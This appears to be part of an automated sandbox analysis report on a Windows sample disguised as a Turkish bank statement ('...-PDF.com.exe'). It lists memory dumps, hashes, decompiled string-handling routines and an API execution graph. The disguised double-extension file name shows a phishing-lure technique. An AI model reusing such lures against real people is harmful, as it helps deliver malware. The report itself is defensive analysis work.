                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                              • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                              • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                              • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                                              0x00405f84
                                                                                              0x00405f8e
                                                                                              0x00405f91
                                                                                              0x00405f97
                                                                                              0x00405f98
                                                                                              0x00405f99
                                                                                              0x00405fa1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405fa1
                                                                                              0x00405fa3
                                                                                              0x00405fab

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F89
                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-1669384263
                                                                                              • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                              • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                              • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                              • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                              0x004060cd
                                                                                              0x004060cf
                                                                                              0x004060d2
                                                                                              0x004060fe
                                                                                              0x004060d7
                                                                                              0x004060e0
                                                                                              0x004060e5
                                                                                              0x004060f0
                                                                                              0x004060f3
                                                                                              0x0040610f
                                                                                              0x004060f5
                                                                                              0x004060fc
                                                                                              0x00000000
                                                                                              0x004060fc
                                                                                              0x00406108
                                                                                              0x0040610c
                                                                                              0x0040610c
                                                                                              0x00406106
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                              • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:4.8%
                                                                                              Dynamic/Decrypted Code Coverage:5.2%
                                                                                              Signature Coverage:5.1%
                                                                                              Total number of Nodes:1963
                                                                                              Total number of Limit Nodes:46
                                                                                              execution_graph 20681 1355136 20684 135531d 20681->20684 20685 135534a 20684->20685 20693 135535b 20684->20693 20695 13551b8 GetModuleHandleW 20685->20695 20690 1355147 20702 1355541 20693->20702 20696 13551c4 20695->20696 20696->20693 20697 13551fb GetModuleHandleExW 20696->20697 20698 135524e 20697->20698 20699 135523a GetProcAddress 20697->20699 20700 1355261 FreeLibrary 20698->20700 20701 135526a 20698->20701 20699->20698 20700->20701 20701->20693 20703 135554d ___unDNameEx 20702->20703 20717 1363682 EnterCriticalSection 20703->20717 20705 1355557 20718 13553b4 20705->20718 20707 1355564 20722 1355582 20707->20722 20710 13552d9 20747 13552b7 20710->20747 20713 13552f7 20715 13551fb __is_exception_typeof 3 API calls 20713->20715 20714 13552e7 GetCurrentProcess TerminateProcess 20714->20713 20716 13552ff ExitProcess 20715->20716 20717->20705 20719 13553c0 ___unDNameEx 20718->20719 20720 1355427 __is_exception_typeof 20719->20720 20725 1357a4e 20719->20725 20720->20707 20746 1363699 LeaveCriticalSection 20722->20746 20724 1355393 20724->20690 20724->20710 20726 1357a5a __EH_prolog3 20725->20726 20729 1357d80 20726->20729 20728 1357a81 UnDecorator::getSymbolName 20728->20720 20730 1357d8c ___unDNameEx 20729->20730 20737 1363682 EnterCriticalSection 20730->20737 20732 1357d9a 20738 1357bf6 20732->20738 20737->20732 20739 1357c0d 20738->20739 20740 1357c15 20738->20740 20742 1357dcf 20739->20742 20740->20739 20741 1364b6e ___free_lconv_mon 14 API calls 20740->20741 20741->20739 20745 1363699 LeaveCriticalSection 20742->20745 20744 1357db8 20744->20728 20745->20744 20746->20724 20752 1365eca GetPEB 20747->20752 20750 13552c1 GetPEB 20751 13552d3 20750->20751 20751->20713 20751->20714 20753 1365ee4 20752->20753 20754 13552bc 20752->20754 20756 1362c5b 20753->20756 20754->20750 20754->20751 20757 13630d1 __dosmaperr 5 API calls 20756->20757 20758 1362c77 20757->20758 20758->20754 20007 1359d3f 20010 1359d6a 20007->20010 20012 1359d76 ___unDNameEx 20010->20012 20011 1359d7d 20013 13676c8 __dosmaperr 14 API calls 20011->20013 20012->20011 20014 1359d9d 20012->20014 20015 1359d82 20013->20015 20016 1359da2 20014->20016 20017 1359daf 20014->20017 20018 1364c41 __strnicoll 41 API calls 20015->20018 20019 13676c8 __dosmaperr 14 API calls 20016->20019 20029 13805f4 20017->20029 20021 1359d51 20018->20021 20019->20021 20023 1359dcc 20037 138075a 20023->20037 20024 1359dbf 20025 13676c8 __dosmaperr 14 API calls 20024->20025 20025->20021 20030 1380600 ___unDNameEx 20029->20030 20047 1363682 EnterCriticalSection 20030->20047 20032 138060e 20048 1380698 20032->20048 20038 13808d2 20037->20038 20068 13809d8 20038->20068 20042 1359de1 20043 1359e0a 20042->20043 20044 1359e0e 20043->20044 20531 1365c71 LeaveCriticalSection 20044->20531 20046 1359e1f 20046->20021 20047->20032 20057 13806bb 20048->20057 20049 1380713 20050 1367808 __dosmaperr 14 API calls 20049->20050 20051 138071c 20050->20051 20053 1364b6e ___free_lconv_mon 14 API calls 20051->20053 20054 1380725 20053->20054 20055 13629cf __wsopen_s 6 API calls 20054->20055 20056 138061b 20054->20056 20058 1380744 20055->20058 20061 1380654 20056->20061 20057->20049 20057->20056 20064 1365c5d EnterCriticalSection 20057->20064 20065 1365c71 LeaveCriticalSection 20057->20065 20066 1365c5d EnterCriticalSection 20058->20066 20067 1363699 LeaveCriticalSection 20061->20067 20063 1359db8 20063->20023 20063->20024 20064->20057 20065->20057 20066->20056 20067->20063 20069 13809f7 20068->20069 20070 1380a0a 20069->20070 20076 1380a1f UnDecorator::getCHPEName 20069->20076 20071 13676c8 __dosmaperr 14 API calls 20070->20071 20072 1380a0f 20071->20072 20073 1364c41 __strnicoll 41 API calls 20072->20073 20075 13808e8 20073->20075 20074 1380b3f 20074->20075 20077 13676c8 __dosmaperr 14 API calls 20074->20077 20075->20042 20085 1388e13 20075->20085 20076->20074 20088 1388cb0 20076->20088 20078 1380bf0 20077->20078 20079 1364c41 __strnicoll 41 API calls 20078->20079 20079->20075 20081 1380b8f 20081->20074 20082 1388cb0 41 API calls 20081->20082 20083 1380bad 20082->20083 20083->20074 20084 1388cb0 41 API calls 20083->20084 20084->20074 20136 138936e 20085->20136 20089 1388cbf 20088->20089 20090 1388d07 20088->20090 20092 1388cc5 20089->20092 20093 1388ce2 20089->20093 20102 1388d1d 20090->20102 20095 13676c8 __dosmaperr 14 API calls 20092->20095 20097 13676c8 __dosmaperr 14 API calls 20093->20097 20101 1388d00 20093->20101 20094 1388cd5 20094->20081 20096 1388cca 20095->20096 20098 1364c41 __strnicoll 41 API calls 20096->20098 20099 1388cf1 20097->20099 20098->20094 20100 1364c41 __strnicoll 41 API calls 20099->20100 20100->20094 20101->20081 20103 1388d2d 20102->20103 20104 1388d47 20102->20104 20105 13676c8 __dosmaperr 14 API calls 20103->20105 20106 1388d4f 20104->20106 20107 1388d66 20104->20107 20110 1388d32 20105->20110 20111 13676c8 __dosmaperr 14 API calls 20106->20111 20108 1388d89 20107->20108 20109 1388d72 20107->20109 20119 1388d3d 20108->20119 20120 13642b8 20108->20120 20112 13676c8 __dosmaperr 14 API calls 20109->20112 20113 1364c41 __strnicoll 41 API calls 20110->20113 20114 1388d54 20111->20114 20115 1388d77 20112->20115 20113->20119 20117 1364c41 __strnicoll 41 API calls 20114->20117 20118 1364c41 __strnicoll 41 API calls 20115->20118 20117->20119 20118->20119 20119->20094 20121 13642cf 20120->20121 20122 13642d8 20120->20122 20121->20119 20122->20121 20123 136373a _unexpected 41 API calls 20122->20123 20124 13642f8 20123->20124 20128 1384400 20124->20128 20129 136430e 20128->20129 20130 1384413 20128->20130 20132 138442d 20129->20132 20130->20129 20131 1368dd5 __strnicoll 41 API calls 20130->20131 20131->20129 20133 1384440 20132->20133 20134 1384455 20132->20134 20133->20134 20135 1364241 __strnicoll 41 API calls 20133->20135 20134->20121 20135->20134 20139 138937a ___unDNameEx 20136->20139 20137 1389381 20138 13676c8 __dosmaperr 14 API calls 20137->20138 20140 1389386 20138->20140 20139->20137 20141 13893ac 20139->20141 20142 1364c41 __strnicoll 41 API calls 20140->20142 20147 1388e3e 20141->20147 20146 1388e2e 20142->20146 20146->20042 20160 136cf83 20147->20160 20152 1388e74 20154 1388ea6 20152->20154 20155 1364b6e ___free_lconv_mon 14 API calls 20152->20155 20156 1389403 20154->20156 20155->20154 20157 1389409 20156->20157 20158 138942d 20156->20158 20530 13702fe LeaveCriticalSection 20157->20530 20158->20146 20161 13642b8 __strnicoll 41 API calls 20160->20161 20162 136cf95 20161->20162 20163 136cfa7 20162->20163 20215 1362636 20162->20215 20165 136d09d 20163->20165 20221 136d49c 20165->20221 20168 1388eac 20266 1389671 20168->20266 20171 1388ede 20173 1367721 __dosmaperr 14 API calls 20171->20173 20172 1388ef7 20284 136ff57 20172->20284 20176 1388ee3 20173->20176 20181 13676c8 __dosmaperr 14 API calls 20176->20181 20177 1388f1c 20297 13894f0 CreateFileW 20177->20297 20178 1388f05 20179 1367721 __dosmaperr 14 API calls 20178->20179 20182 1388f0a 20179->20182 20206 1388ef0 20181->20206 20183 13676c8 __dosmaperr 14 API calls 20182->20183 20183->20176 20184 1388fd2 GetFileType 20185 1388fdd GetLastError 20184->20185 20186 1389024 20184->20186 20188 136777a __dosmaperr 14 API calls 20185->20188 20299 13700fb 20186->20299 20187 1388fa7 GetLastError 20190 136777a __dosmaperr 14 API calls 20187->20190 20191 1388feb CloseHandle 20188->20191 20189 1388f55 20189->20184 20189->20187 20298 13894f0 CreateFileW 20189->20298 20190->20176 20191->20176 20193 1389014 20191->20193 20196 13676c8 __dosmaperr 14 API calls 20193->20196 20195 1388f9a 20195->20184 20195->20187 20198 1389019 20196->20198 20198->20176 20199 1389091 20203 1389098 20199->20203 20329 1389895 20199->20329 20202 13890c6 20202->20203 20204 13890d4 20202->20204 20323 138f819 20203->20323 20204->20206 20207 1389150 CloseHandle 20204->20207 20206->20152 20358 13894f0 CreateFileW 20207->20358 20209 138917b 20210 1389185 GetLastError 20209->20210 20211 13891b1 20209->20211 20212 136777a __dosmaperr 14 API calls 20210->20212 20211->20206 20213 1389191 20212->20213 20359 137006a 20213->20359 20218 1363161 20215->20218 20219 13630d1 __dosmaperr 5 API calls 20218->20219 20220 136263e 20219->20220 20220->20163 20222 136d4c4 20221->20222 20223 136d4aa 20221->20223 20224 136d4ea 20222->20224 20225 136d4cb 20222->20225 20239 136d083 20223->20239 20248 1368a28 20224->20248 20229 136d0b5 20225->20229 20243 136d02d 20225->20243 20229->20152 20229->20168 20230 136d4f9 20231 136d500 GetLastError 20230->20231 20233 136d526 20230->20233 20234 136d02d __wsopen_s 15 API calls 20230->20234 20251 136777a 20231->20251 20233->20229 20235 1368a28 __strnicoll MultiByteToWideChar 20233->20235 20234->20233 20237 136d53d 20235->20237 20237->20229 20237->20231 20238 13676c8 __dosmaperr 14 API calls 20238->20229 20240 136d08e 20239->20240 20241 136d096 20239->20241 20242 1364b6e ___free_lconv_mon 14 API calls 20240->20242 20241->20229 20242->20241 20244 136d083 __wsopen_s 14 API calls 20243->20244 20245 136d03b 20244->20245 20256 136cf54 20245->20256 20249 1368a39 MultiByteToWideChar 20248->20249 20249->20230 20252 1367721 __dosmaperr 14 API calls 20251->20252 20253 1367785 __dosmaperr 20252->20253 20254 13676c8 __dosmaperr 14 API calls 20253->20254 20255 1367798 20254->20255 20255->20238 20259 1367865 20256->20259 20260 13678a3 20259->20260 20264 1367873 __fread_nolock 20259->20264 20261 13676c8 __dosmaperr 14 API calls 20260->20261 20263 13678a1 20261->20263 20262 136788e HeapAlloc 20262->20263 20262->20264 20263->20229 20264->20260 20264->20262 20265 1364f71 __fread_nolock EnterCriticalSection LeaveCriticalSection 20264->20265 20265->20264 20267 13896ac 20266->20267 20268 1389692 20266->20268 20368 138956e 20267->20368 20268->20267 20270 13676c8 __dosmaperr 14 API calls 20268->20270 20271 13896a1 20270->20271 20272 1364c41 __strnicoll 41 API calls 20271->20272 20272->20267 20273 13896e4 20274 1389713 20273->20274 20276 13676c8 __dosmaperr 14 API calls 20273->20276 20277 1388ec9 20274->20277 20375 1358a96 20274->20375 20279 1389708 20276->20279 20277->20171 20277->20172 20278 1389761 20278->20277 20280 13897de 20278->20280 20281 1364c41 __strnicoll 41 API calls 20279->20281 20282 1364c6e __wsopen_s 11 API calls 20280->20282 20281->20274 20283 13897ea 20282->20283 20285 136ff63 ___unDNameEx 20284->20285 20382 1363682 EnterCriticalSection 20285->20382 20287 136ffb1 20383 1370061 20287->20383 20289 136ff6a 20289->20287 20290 136ff8f 20289->20290 20294 136fffe EnterCriticalSection 20289->20294 20292 137018d __wsopen_s 15 API calls 20290->20292 20293 136ff94 20292->20293 20293->20287 20386 13702db EnterCriticalSection 20293->20386 20294->20287 20296 137000b LeaveCriticalSection 20294->20296 20296->20289 20297->20189 20298->20195 20300 1370173 20299->20300 20301 137010a 20299->20301 20302 13676c8 __dosmaperr 14 API calls 20300->20302 20301->20300 20306 1370130 __wsopen_s 20301->20306 20303 1370178 20302->20303 20304 1367721 __dosmaperr 14 API calls 20303->20304 20305 1370160 20304->20305 20305->20199 20308 13897eb 20305->20308 20306->20305 20307 137015a SetStdHandle 20306->20307 20307->20305 20309 1389845 20308->20309 20310 1389813 20308->20310 20309->20199 20310->20309 20311 1381e3c __fread_nolock 43 API calls 20310->20311 20312 1389823 20311->20312 20313 1389849 20312->20313 20314 1389833 20312->20314 20388 13810ae 20313->20388 20316 1367721 __dosmaperr 14 API calls 20314->20316 20318 1389838 20316->20318 20318->20309 20321 13676c8 __dosmaperr 14 API calls 20318->20321 20319 1389871 20319->20318 20320 1381e3c __fread_nolock 43 API calls 20319->20320 20320->20318 20321->20309 20324 138f82c __vswprintf_c_l 20323->20324 20511 138f849 20324->20511 20326 138f838 20327 135a44b __vswprintf_c_l 41 API calls 20326->20327 20328 138f844 20327->20328 20328->20206 20330 13899a9 20329->20330 20331 13898c6 20329->20331 20330->20202 20332 1358a96 __wsopen_s 41 API calls 20331->20332 20340 13898e6 20331->20340 20333 13898dd 20332->20333 20334 1389ad8 20333->20334 20333->20340 20335 1364c6e __wsopen_s 11 API calls 20334->20335 20336 1389ae2 20335->20336 20338 138936e __wsopen_s 92 API calls 20336->20338 20337 13899cf 20337->20330 20339 13810ae __fread_nolock 53 API calls 20337->20339 20345 13899d9 20337->20345 20341 1389b07 20338->20341 20347 1389a01 20339->20347 20340->20330 20340->20337 20342 1381e3c __fread_nolock 43 API calls 20340->20342 20344 13899a0 20340->20344 20341->20202 20343 13899b9 20342->20343 20343->20344 20348 13899c4 20343->20348 20344->20330 20344->20345 20524 1384686 20344->20524 20345->20330 20352 13676c8 __dosmaperr 14 API calls 20345->20352 20346 1389a6c 20356 1381e3c __fread_nolock 43 API calls 20346->20356 20347->20330 20347->20345 20347->20346 20349 1389a39 20347->20349 20350 1389a46 20347->20350 20353 1381e3c __fread_nolock 43 API calls 20348->20353 20354 13676c8 __dosmaperr 14 API calls 20349->20354 20350->20346 20355 1389a4e 20350->20355 20352->20330 20353->20337 20354->20345 20357 1381e3c __fread_nolock 43 API calls 20355->20357 20356->20345 20357->20345 20358->20209 20360 13700e0 20359->20360 20361 1370079 20359->20361 20362 13676c8 __dosmaperr 14 API calls 20360->20362 20361->20360 20367 13700a3 __wsopen_s 20361->20367 20363 13700e5 20362->20363 20364 1367721 __dosmaperr 14 API calls 20363->20364 20365 13700d0 20364->20365 20365->20211 20366 13700ca SetStdHandle 20366->20365 20367->20365 20367->20366 20371 1389586 20368->20371 20369 13895a1 20369->20273 20370 13676c8 __dosmaperr 14 API calls 20372 13895c5 20370->20372 20371->20369 20371->20370 20373 1364c41 __strnicoll 41 API calls 20372->20373 20374 13895d0 20373->20374 20374->20273 20376 1358ab7 20375->20376 20377 1358aa2 20375->20377 20376->20278 20378 13676c8 __dosmaperr 14 API calls 20377->20378 20379 1358aa7 20378->20379 20380 1364c41 __strnicoll 41 API calls 20379->20380 20381 1358ab2 20380->20381 20381->20278 20382->20289 20387 1363699 LeaveCriticalSection 20383->20387 20385 136ffd1 20385->20177 20385->20178 20386->20287 20387->20385 20389 13810d8 20388->20389 20390 13810c0 20388->20390 20392 138142e 20389->20392 20397 138111e 20389->20397 20391 1367721 __dosmaperr 14 API calls 20390->20391 20393 13810c5 20391->20393 20394 1367721 __dosmaperr 14 API calls 20392->20394 20395 13676c8 __dosmaperr 14 API calls 20393->20395 20396 1381433 20394->20396 20398 13810cd 20395->20398 20399 13676c8 __dosmaperr 14 API calls 20396->20399 20397->20398 20400 1381129 20397->20400 20404 1381159 20397->20404 20398->20319 20455 138f3f4 20398->20455 20401 1381136 20399->20401 20402 1367721 __dosmaperr 14 API calls 20400->20402 20405 1364c41 __strnicoll 41 API calls 20401->20405 20403 138112e 20402->20403 20406 13676c8 __dosmaperr 14 API calls 20403->20406 20407 1381172 20404->20407 20408 138118c 20404->20408 20409 13811bd 20404->20409 20405->20398 20406->20401 20407->20408 20410 1381177 20407->20410 20412 1367721 __dosmaperr 14 API calls 20408->20412 20413 1367865 __fread_nolock 15 API calls 20409->20413 20417 13852cb __fread_nolock 41 API calls 20410->20417 20414 1381191 20412->20414 20415 13811ce 20413->20415 20416 13676c8 __dosmaperr 14 API calls 20414->20416 20418 1364b6e ___free_lconv_mon 14 API calls 20415->20418 20419 1381198 20416->20419 20420 138130a 20417->20420 20422 13811d7 20418->20422 20423 1364c41 __strnicoll 41 API calls 20419->20423 20421 138137e 20420->20421 20424 1381323 GetConsoleMode 20420->20424 20426 1381382 ReadFile 20421->20426 20425 1364b6e ___free_lconv_mon 14 API calls 20422->20425 20452 13811a3 __fread_nolock 20423->20452 20424->20421 20427 1381334 20424->20427 20428 13811de 20425->20428 20429 138139a 20426->20429 20430 13813f6 GetLastError 20426->20430 20427->20426 20431 138133a ReadConsoleW 20427->20431 20432 13811e8 20428->20432 20433 1381203 20428->20433 20429->20430 20437 1381373 20429->20437 20434 1381403 20430->20434 20439 138135a 20430->20439 20431->20437 20438 1381354 GetLastError 20431->20438 20441 13676c8 __dosmaperr 14 API calls 20432->20441 20435 1381e3c __fread_nolock 43 API calls 20433->20435 20436 13676c8 __dosmaperr 14 API calls 20434->20436 20442 1381211 20435->20442 20443 1381408 20436->20443 20447 13813bf 20437->20447 20448 13813d6 20437->20448 20437->20452 20438->20439 20444 136777a __dosmaperr 14 API calls 20439->20444 20439->20452 20440 1364b6e ___free_lconv_mon 14 API calls 20440->20398 20445 13811ed 20441->20445 20442->20410 20446 1367721 __dosmaperr 14 API calls 20443->20446 20444->20452 20449 1367721 __dosmaperr 14 API calls 20445->20449 20446->20452 20461 138152a 20447->20461 20451 13813ef 20448->20451 20448->20452 20453 13811f8 20449->20453 20474 13817cd 20451->20474 20452->20440 20453->20452 20456 138f407 __vswprintf_c_l 20455->20456 20486 138f42b 20456->20486 20459 135a44b __vswprintf_c_l 41 API calls 20460 138f426 20459->20460 20460->20319 20480 1381681 20461->20480 20463 1368a28 __strnicoll MultiByteToWideChar 20467 138163e 20463->20467 20465 13815cc 20472 1381586 20465->20472 20473 1381e3c __fread_nolock 43 API calls 20465->20473 20466 13815bc 20468 13676c8 __dosmaperr 14 API calls 20466->20468 20469 1381647 GetLastError 20467->20469 20470 1381572 20467->20470 20468->20470 20471 136777a __dosmaperr 14 API calls 20469->20471 20470->20452 20471->20470 20472->20463 20473->20472 20475 1381804 20474->20475 20476 1381894 20475->20476 20477 1381899 ReadFile 20475->20477 20476->20453 20477->20476 20478 13818b2 20477->20478 20478->20476 20479 1381e3c __fread_nolock 43 API calls 20478->20479 20479->20476 20481 13816b5 20480->20481 20482 1381724 ReadFile 20481->20482 20483 1381541 20481->20483 20482->20483 20484 138173d 20482->20484 20483->20465 20483->20466 20483->20470 20483->20472 20484->20483 20485 1381e3c __fread_nolock 43 API calls 20484->20485 20485->20483 20506 138f6f3 20486->20506 20489 138f548 20492 1381e3c __fread_nolock 43 API calls 20489->20492 20502 138f511 20489->20502 20490 138f484 20494 1367808 __dosmaperr 14 API calls 20490->20494 20491 1381e3c __fread_nolock 43 API calls 20495 138f419 20491->20495 20493 138f560 20492->20493 20497 136fdd7 __fread_nolock 41 API calls 20493->20497 20493->20502 20496 138f490 __wsopen_s 20494->20496 20495->20459 20498 138f498 20496->20498 20503 13846db __wsopen_s 64 API calls 20496->20503 20504 138f502 __wsopen_s 20496->20504 20499 138f57b SetEndOfFile 20497->20499 20501 1364b6e ___free_lconv_mon 14 API calls 20498->20501 20500 138f587 GetLastError 20499->20500 20499->20502 20500->20502 20501->20502 20502->20491 20503->20496 20505 1364b6e ___free_lconv_mon 14 API calls 20504->20505 20505->20502 20507 1381e3c __fread_nolock 43 API calls 20506->20507 20508 138f70c 20507->20508 20509 1381e3c __fread_nolock 43 API calls 20508->20509 20510 138f448 20509->20510 20510->20489 20510->20490 20510->20502 20512 136fdd7 __fread_nolock 41 API calls 20511->20512 20515 138f859 20512->20515 20513 138f85f 20514 137006a __wsopen_s 15 API calls 20513->20514 20523 138f8b7 __fread_nolock 20514->20523 20515->20513 20516 138f891 20515->20516 20518 136fdd7 __fread_nolock 41 API calls 20515->20518 20516->20513 20517 136fdd7 __fread_nolock 41 API calls 20516->20517 20519 138f89d CloseHandle 20517->20519 20520 138f888 20518->20520 20519->20513 20521 138f8a9 GetLastError 20519->20521 20522 136fdd7 __fread_nolock 41 API calls 20520->20522 20521->20513 20522->20516 20523->20326 20525 1384699 __vswprintf_c_l 20524->20525 20526 13848db __wsopen_s 66 API calls 20525->20526 20527 13846ab 20526->20527 20528 135a44b __vswprintf_c_l 41 API calls 20527->20528 20529 13846b8 20528->20529 20529->20344 20530->20158 20531->20046 24413 135a83b 24414 135a84f __vswprintf_c_l 24413->24414 24419 135afa8 24414->24419 24417 135a44b __vswprintf_c_l 41 API calls 24418 135a869 24417->24418 24420 135afb4 ___unDNameEx 24419->24420 24421 135afde 24420->24421 24422 135afbb 24420->24422 24430 1365c5d EnterCriticalSection 24421->24430 24424 1364e5b _fwprintf_s 29 API calls 24422->24424 24425 135a85b 24424->24425 24425->24417 24426 135afec 24427 135ad55 46 API calls 24426->24427 24428 135affb 24427->24428 24431 135b02d 24428->24431 24430->24426 24434 1365c71 LeaveCriticalSection 24431->24434 24433 135b035 24433->24425 24434->24433 19265 9508b7 19277 95005f GetPEB 19265->19277 19267 950935 19278 950838 19267->19278 19269 95093d 